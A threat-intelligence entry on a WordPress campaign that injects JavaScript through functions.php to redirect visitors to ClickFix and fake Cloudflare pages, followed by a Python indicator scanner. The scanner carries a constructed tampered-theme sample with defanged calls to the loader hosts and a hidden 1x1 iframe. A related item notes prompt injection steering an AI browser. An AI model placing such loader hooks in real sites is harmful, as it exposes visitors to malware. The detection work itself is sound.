WordPress malicious JavaScript redirect campaign
Campaign
Summary
The WordPress compromise campaign is turning site visits into a malware delivery path, redirecting users to ClickFix-style pages and fake Cloudflare verification screens. Attackers injected malicious JavaScript through functions.php and used remote loaders on brazilc[.]com and porsasystem[.]com to serve the payload. The activity matters because it reaches normal visitors through trusted websites and can hand them off to malware pages. It also hides behind legitimate-looking ads and browser-challenge branding to reduce suspicion.
Related Happenings
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
FAUX#ELEVATE phishing campaign targeting French-speaking corporate environments
Campaign
First: 24.03.2026 18:35
Last: 24.03.2026 18:35
Sources 1
About this happening:
The **FAUX#ELEVATE** phishing campaign is actively targeting **French-speaking corporate environments** with **fake resume/CV lures** that deliver malware for **credential theft**...
ClickFix MacSync social-engineering campaign targeting macOS users
Campaign
First: 16.03.2026 13:41
Last: 16.03.2026 13:41
Sources 1
About this happening:
A **ClickFix** campaign is using **fake Cloudflare CAPTCHA verification challenges**, **embedded video tutorials**, and **automatic OS detection** to trick victims into pasting an...
Perplexity Comet prompt-injection research shows agentic browsers can be trained into phishing traps
Technical Analysis
First: 11.03.2026 18:38
Last: 11.03.2026 18:38
Sources 1
About this happening:
**Perplexity's Comet AI browser** is the focus of a **technical analysis** thread showing how **prompt injection** and **malicious URLs** can steer an agentic browser into **data...
Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims
Campaign
First: 11.03.2026 16:45
Last: 11.03.2026 16:45
Sources 1
About this happening:
A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...
Timeline
- 08.10.2025 19:43 · 1 article · 7mo ago
Compromised WordPress sites redirect visitors to ClickFix pages
Exploitation Observed
Users visiting compromised sites on September 19, 2025 were sent through an infection chain that executed `porsasystem[.]com/6m9x.js`, then `porsasystem[.]com/js.php`, and then directed victims to ClickFix-style pages for malware delivery.
Sources:
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- 08.10.2025 19:43 · 2 articles · 7mo ago
Sucuri analyzes malicious WordPress JavaScript loader
Technical Analysis Update
On October 8, 2025, Sucuri investigators found a compromised WordPress site serving suspicious third-party JavaScript after attackers modified `functions.php`; the loader sent HTTP POST requests to `brazilc[.]com`, which returned code that loaded `porsasystem[.]com` and a hidden 1x1 pixel iframe mimicking Cloudflare challenge assets such as `cdn-cgi/challenge-platform/scripts/jsd/main.js` to redirect site visitors.
Sources:
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
- Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks — thehackernews.com — 08.10.2025 19:43
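A site owner can check a theme's `functions.php` for the indicators named in the timeline above. The scanner below is an added example, not code from this page, Sucuri or the cited article. Its function name, the "review" heuristics (theme PHP should not reference the Cloudflare challenge script or emit a 1x1 iframe) and the sample file are assumptions constructed for illustration.

```python
import re

# Indicators named in the timeline above. DOT accepts the defanged "[.]"
# used on this page as well as the literal dot found in real files.
DOT = r"(?:\[\.\]|\.)"
IOC = {
    "brazilc loader host": re.compile(rf"\bbrazilc{DOT}com\b", re.I),
    "porsasystem payload host": re.compile(rf"\bporsasystem{DOT}com\b", re.I),
}
# Assumption: theme PHP has no reason to reference Cloudflare's challenge
# script, so a match is a "review" finding rather than a confirmed hit.
REVIEW = {
    "Cloudflare challenge path in theme code":
        re.compile(r"cdn-cgi/challenge-platform/scripts/jsd/main\.js", re.I),
}
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height of exactly 1 (attribute or inline style, quotes may be escaped)
ONE_PX = re.compile(r"""\b(width|height)\s*[=:]\s*\\?["']?1(?:px)?\b""", re.I)

# Constructed sample of a tampered functions.php (domains kept defanged).
SAMPLE = r'''<?php
add_action('wp_head', 'theme_setup_assets');
function theme_setup_assets() {
    $r = wp_remote_post('https://brazilc[.]com/');
    echo '<script src="https://porsasystem[.]com/6m9x.js"></script>';
    echo '<iframe src="/cdn-cgi/challenge-platform/scripts/jsd/main.js" width="1" height="1"></iframe>';
}
add_theme_support('post-thumbnails');
'''

def scan_php(source):
    """Return (line_number, severity, label) for each indicator found."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for sev, table in (("ioc", IOC), ("review", REVIEW)):
            hits += [(n, sev, label) for label, rx in table.items() if rx.search(line)]
        for tag in IFRAME.findall(line):
            dims = {m.group(1).lower() for m in ONE_PX.finditer(tag)}
            if dims == {"width", "height"}:  # both dimensions are 1
                hits.append((n, "review", "1x1 iframe emitted by theme code"))
    return hits

if __name__ == "__main__":
    for lineno, severity, label in scan_php(SAMPLE):
        print(f"functions.php:{lineno}: [{severity}] {label}")
```

An "ioc" finding means the file references a host this campaign used; a "review" finding needs a human to compare the line against the theme's original source.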